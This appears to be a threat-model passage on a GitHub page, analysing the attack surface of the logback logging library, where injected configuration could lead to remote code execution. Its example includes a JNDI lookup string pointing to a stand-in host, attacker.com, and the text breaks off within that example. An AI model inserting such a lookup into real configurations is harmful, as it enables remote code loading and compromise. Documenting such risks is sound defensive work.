Skip to content

Latest commit

 

History

History
8 lines (5 loc) · 707 Bytes

File metadata and controls

8 lines (5 loc) · 707 Bytes

Attack Surface Analysis for qos-ch/logback

  • Description: Attackers inject malicious Logback configuration to control logging behavior, potentially leading to RCE or other exploits.
  • Logback Contribution: Logback's core functionality relies on its configuration (XML or programmatic). This configuration defines Logback's behavior, making it a high-value target. The vulnerability exists when Logback processes untrusted configuration data.
  • Example: An attacker modifies logback.xml to include a JNDI lookup: `<insert value="${jndi:ldap://attacker.com/evil}